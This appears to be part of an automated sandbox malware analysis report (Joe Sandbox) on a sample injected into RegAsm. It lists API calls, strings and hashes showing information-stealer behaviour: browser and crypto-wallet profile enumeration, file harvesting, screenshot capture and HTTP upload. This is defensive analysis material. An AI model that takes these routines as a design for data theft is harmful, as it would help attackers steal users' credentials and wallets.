API calls 69976->69978 69979 411611 strtok_s 69976->69979 69980 4115ae StrCmpCA 69976->69980 69981 411589 StrCmpCA 69976->69981 69982 41155b StrCmpCA 69976->69982 69977->69976 69978->69979 69979->69975 69979->69976 69980->69976 69981->69976 69982->69976 70665 40fb4d 69983->70665 69985 411674 strtok_s 69986 4116fa 69985->69986 
69987 411681 69985->69987 69986->68757 69988 4116ab StrCmpCA 69987->69988 69989 40f997 2 API calls 69987->69989 69990 4116e3 strtok_s 69987->69990 69991 40f997 2 API calls 69987->69991 69988->69987 69989->69990 69990->69986 69990->69987 69991->69987 69993 40f923 lstrcpy 69992->69993 69994 414625 69993->69994 69995 40fa9c 4 API calls 69994->69995 69996 41463a 69995->69996 69997 40f9e1 lstrcpy 69996->69997 69998 414647 69997->69998 69999 40fa9c 4 API calls 69998->69999 70000 414665 69999->70000 70001 40f9e1 lstrcpy 70000->70001 70002 414672 70001->70002 70003 40fa9c 4 API calls 70002->70003 70004 41468f 70003->70004 70005 40f9e1 lstrcpy 70004->70005 70006 41469c 70005->70006 70007 40fa9c 4 API calls 70006->70007 70008 4146b9 70007->70008 70009 40f9e1 lstrcpy 70008->70009 70010 4146c6 70009->70010 70011 40fa9c 4 API calls 70010->70011 70012 4146e3 70011->70012 70013 40f9e1 lstrcpy 70012->70013 70014 4146f0 70013->70014 70666 40fc38 GetProcessHeap HeapAlloc GetLocalTime wsprintfA 70014->70666 70016 414701 70017 40fa9c 4 API calls 70016->70017 70018 41470e 70017->70018 70019 40f9e1 lstrcpy 70018->70019 70020 41471b 70019->70020 70021 40fa9c 4 API calls 70020->70021 70022 414738 70021->70022 70023 40f9e1 lstrcpy 70022->70023 70024 414745 70023->70024 70025 40fa9c 4 API calls 70024->70025 70026 414762 70025->70026 70027 40f9e1 lstrcpy 70026->70027 70028 41476f 70027->70028 70667 410415 memset RegOpenKeyExA 70028->70667 70030 414780 70031 40fa9c 4 API calls 70030->70031 70032 41478d 70031->70032 70033 40f9e1 lstrcpy 70032->70033 70034 41479a 70033->70034 70035 40fa9c 4 API calls 70034->70035 70036 4147b7 70035->70036 70037 40f9e1 lstrcpy 70036->70037 70038 4147c4 70037->70038 70039 40fa9c 4 API calls 70038->70039 70040 4147e1 70039->70040 70041 40f9e1 lstrcpy 70040->70041 70042 4147ee 70041->70042 70043 4104a2 2 API calls 70042->70043 70044 414803 70043->70044 70045 40fa28 3 API calls 70044->70045 70046 414815 70045->70046 70047 40f9e1 lstrcpy 70046->70047 70048 414822 

Control-flow Graph

APIs
                                                                                • GetProcAddress.KERNEL32 ref: 00417F69
                                                                                • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00417F7F
                                                                                • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 00417F95
                                                                                • GetProcAddress.KERNEL32(74E00000), ref: 00417FB0
                                                                                • GetProcAddress.KERNEL32 ref: 00417FC7
                                                                                • GetProcAddress.KERNEL32 ref: 00417FDE
                                                                                • GetProcAddress.KERNEL32 ref: 00417FF5
                                                                                • GetProcAddress.KERNEL32(74DF0000), ref: 00418010
                                                                                • GetProcAddress.KERNEL32(6E340000), ref: 0041802B
                                                                                • GetProcAddress.KERNEL32 ref: 00418042
                                                                                • GetProcAddress.KERNEL32 ref: 00418059
                                                                                • GetProcAddress.KERNEL32 ref: 00418070
                                                                                • GetProcAddress.KERNEL32(6CB30000,SymMatchString), ref: 0041808A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad
                                                                                • String ID: HttpQueryInfoA$InternetSetOptionA$SymMatchString$dbghelp.dll
                                                                                • API String ID: 2238633743-951535364
                                                                                • Opcode ID: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                • Instruction ID: b1e844fb62b820e65f219bf097f7cac9561447c547020423e5517cd844e2ca6b
                                                                                • Opcode Fuzzy Hash: 03224874fb45e6c46fb278b45bf30394fb78a2bdfedb5a718972308c7089d793
                                                                                • Instruction Fuzzy Hash: 3D42D97E811620EFEB929FA0FD48A653BB3F70AB01B147439FA0586231D7364865EF54

                                                                                Control-flow Graph

                                                                                [Figure: control_flow_graph 605 40514c-40521b]
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00405151
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                  • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                  • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                  • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004051FC
                                                                                • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040539B
                                                                                • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 004053D2
                                                                                • lstrlenA.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,mode,00000000,?,00000000,?,00425B20,00000000), ref: 004057CC
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004057DD
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004057E7
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004057EE
                                                                                • lstrlenA.KERNEL32(00000000), ref: 004057FF
                                                                                • memcpy.MSVCRT ref: 00405810
                                                                                • lstrlenA.KERNEL32(00000000), ref: 00405821
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 0040583A
                                                                                • memcpy.MSVCRT ref: 00405843
                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405856
                                                                                • HttpSendRequestA.WININET(?,00000000,00000000), ref: 0040586A
                                                                                • InternetReadFile.WININET(?,?,000000C7,?), ref: 004058BE
                                                                                • InternetCloseHandle.WININET(?), ref: 004058C9
                                                                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004053F7
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                • InternetCloseHandle.WININET(?), ref: 004058D2
                                                                                • InternetCloseHandle.WININET(?), ref: 004058DB
                                                                                • StrCmpCA.SHLWAPI(?), ref: 00405213
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internetlstrlen$lstrcpy$H_prolog$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileOptionProcessReadSend
                                                                                • String ID: "$"$"$($------$------$------$------$build_id$mode
                                                                                • API String ID: 2237346945-1447386369
                                                                                • Opcode ID: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                • Instruction ID: b4e14776caadebfe53afa945c4bf6ce093965098b883e79db6b3ac6117d29439
                                                                                • Opcode Fuzzy Hash: c89f37200f9922f7106968f5488809e0814500ea6250647198128ec8ff4c3949
                                                                                • Instruction Fuzzy Hash: 6D425EB190414DEADB11EBE1C956BEEBBB8AF18308F50017EE505B3582DB781B4CCB65

                                                                                Control-flow Graph

                                                                                [Figure: control_flow_graph 1469 40c679-40c72b]
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0040C67E
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00425BD3,00425BD2,00000000,?,00425D1C,?,?,00425BCF,?,?,00000000), ref: 0040C71F
                                                                                • StrCmpCA.SHLWAPI(?,00425D20,?,?,00000000), ref: 0040C786
                                                                                • StrCmpCA.SHLWAPI(?,00425D24,?,?,00000000), ref: 0040C7A0
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00425D28,?,?,00425BD6,?,?,00000000), ref: 0040C851
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                • String ID: Brave$Google Chrome$H$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                • API String ID: 3869166975-1816240570
                                                                                • Opcode ID: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                • Instruction ID: 7e6182c7e919ebae31536edbd22d10e843a74c74831f1e41d64d485d49d03601
                                                                                • Opcode Fuzzy Hash: 6ef869c5acf4193e10be2cf9d0355ff0e5442593db8ce554f40d3e93bb02fcfc
                                                                                • Instruction Fuzzy Hash: 3A826070900288EADF25EBA5C955BDDBBB4AF19304F5040BEE449B32C2DB78174DCB66

                                                                                Control-flow Graph

                                                                                [Figure: control_flow_graph 1847 4153f6-415469]
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004153FB
                                                                                • wsprintfA.USER32 ref: 00415421
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415438
                                                                                • memset.MSVCRT ref: 0041544F
                                                                                • memset.MSVCRT ref: 0041545D
                                                                                • StrCmpCA.SHLWAPI(?,0042684C), ref: 0041547B
                                                                                • StrCmpCA.SHLWAPI(?,00426850), ref: 00415495
                                                                                • wsprintfA.USER32 ref: 004154B9
                                                                                • StrCmpCA.SHLWAPI(?,0042656E), ref: 004154CA
                                                                                • wsprintfA.USER32 ref: 004154F0
                                                                                • wsprintfA.USER32 ref: 00415504
                                                                                • memset.MSVCRT ref: 00415516
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415528
                                                                                • strtok_s.MSVCRT ref: 00415561
                                                                                • memset.MSVCRT ref: 00415576
                                                                                • lstrcat.KERNEL32(?,?), ref: 0041558B
                                                                                • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004155AE
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                  • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004156B0
                                                                                • strtok_s.MSVCRT ref: 004156E1
                                                                                • FindNextFileA.KERNELBASE(000000FF,?), ref: 00415804
                                                                                • FindClose.KERNEL32(000000FF), ref: 00415815
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(6C83F688,00001000), ref: 6C7B35D5
                                                                                • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C7B35E0
                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 6C7B35FD
                                                                                • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C7B363F
                                                                                • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C7B369F
                                                                                • __aulldiv.LIBCMT ref: 6C7B36E4
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6C7B3773
                                                                                • EnterCriticalSection.KERNEL32(6C83F688), ref: 6C7B377E
                                                                                • LeaveCriticalSection.KERNEL32(6C83F688), ref: 6C7B37BD
                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6C7B37C4
                                                                                • EnterCriticalSection.KERNEL32(6C83F688), ref: 6C7B37CB
                                                                                • LeaveCriticalSection.KERNEL32(6C83F688), ref: 6C7B3801
                                                                                • __aulldiv.LIBCMT ref: 6C7B3883
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C7B3902
                                                                                • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C7B3918
                                                                                • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C7B394C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 004162B4
                                                                                • wsprintfA.USER32 ref: 004162D4
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004162EB
                                                                                • StrCmpCA.SHLWAPI(?,00426908), ref: 00416308
                                                                                • StrCmpCA.SHLWAPI(?,0042690C), ref: 00416322
                                                                                • wsprintfA.USER32 ref: 00416346
                                                                                • StrCmpCA.SHLWAPI(?,0042657D), ref: 00416357
                                                                                • wsprintfA.USER32 ref: 00416374
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • wsprintfA.USER32 ref: 00416388
                                                                                • PathMatchSpecA.SHLWAPI(?,?), ref: 0041639B
                                                                                • lstrcat.KERNEL32(?,?), ref: 004163C7
                                                                                • lstrcat.KERNEL32(?,00426924), ref: 004163D9
                                                                                • lstrcat.KERNEL32(?,?), ref: 004163E9
                                                                                • lstrcat.KERNEL32(?,00426928), ref: 004163FB
                                                                                • lstrcat.KERNEL32(?,?), ref: 0041640F
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 004165AA
                                                                                • FindClose.KERNEL32(00000000), ref: 004165B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                                                                • String ID: %s\%s$%s\%s$%s\*
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00411302
                                                                                • memset.MSVCRT ref: 00411328
                                                                                • GetDesktopWindow.USER32 ref: 0041135E
                                                                                • GetWindowRect.USER32(00000000,?), ref: 0041136B
                                                                                • GetDC.USER32(00000000), ref: 00411372
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041137C
                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0041138D
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00411398
                                                                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 004113B4
                                                                                • GlobalFix.KERNEL32(?), ref: 00411412
                                                                                • GlobalSize.KERNEL32(?), ref: 0041141E
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                  • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                                                  • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000), ref: 00404421
                                                                                  • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,004259DF,004259DB,004259D3,004259CF,004259CE), ref: 004044A4
                                                                                  • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                                                                • SelectObject.GDI32(00000000,?), ref: 00411498
                                                                                • DeleteObject.GDI32(?), ref: 004114B3
                                                                                • DeleteObject.GDI32(00000000), ref: 004114BA
                                                                                • ReleaseDC.USER32(00000000,?), ref: 004114C4
                                                                                • CloseWindow.USER32(00000000), ref: 004114CB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                • String ID: image/jpeg
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415AC7
                                                                                • wsprintfA.USER32 ref: 00415AEA
                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00415B01
                                                                                • StrCmpCA.SHLWAPI(?,004268D4), ref: 00415B23
                                                                                • StrCmpCA.SHLWAPI(?,004268D8), ref: 00415B3D
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415B72
                                                                                • lstrcat.KERNEL32(?), ref: 00415B85
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415B99
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415BA9
                                                                                • lstrcat.KERNEL32(?,004268DC), ref: 00415BBB
                                                                                • lstrcat.KERNEL32(?,?), ref: 00415BCF
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                  • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                  • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                  • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                  • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                  • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                  • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                  • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                  • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 00415C69
                                                                                • FindClose.KERNEL32(00000000), ref: 00415C78
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                • String ID: %s\%s
                                                                                • API String ID: 2282932919-4073750446
                                                                                • Opcode ID: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                • Instruction ID: 94379aee551275b5d998bba74236b2289a82a8dc712773d574ff1e2d259f5726
                                                                                • Opcode Fuzzy Hash: 297e3daf63be3f9388da754876be3650526065ada206baa5a6a1fd9e4802f159
                                                                                • Instruction Fuzzy Hash: 9E511D72900229ABDF11EBA1DD49EDE7B7CAF49304F0404AAE605E2151E7389789CBA5
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00409F77
                                                                                  • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                  • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                  • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                  • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                  • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                  • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                  • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                  • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                  • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                • StrCmpCA.SHLWAPI(?,00425E68), ref: 0040A050
                                                                                • StrCmpCA.SHLWAPI(?,00425E6C), ref: 0040A06A
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera,00425C13,00425C12,00425C0F,00425C0E,00425C0B,00425C0A,00425C07), ref: 0040A0FD
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera GX), ref: 0040A111
                                                                                • StrCmpCA.SHLWAPI(00000000,Opera Crypto), ref: 0040A125
                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                • String ID: 7$Opera$Opera Crypto$Opera GX$\*.*
                                                                                • API String ID: 3869166975-536343317
                                                                                • Opcode ID: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                • Instruction ID: a17e2f684122670e3be7096712bbacc747ed706b0b8df0d6fbcd956b9d9e9cda
                                                                                • Opcode Fuzzy Hash: 6700c66a51acd6c16a295116433c442144113a80d9080ee2fe10d6ef4b4d74b1
                                                                                • Instruction Fuzzy Hash: 2C425B70904288EADF15EBE5C955BDDBBB46F29308F5040BEA409736C2DB781B4CCB66
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 00415848
                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                • memset.MSVCRT ref: 004158C9
                                                                                • GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                • lstrcpy.KERNEL32(?,00000000), ref: 00415910
                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
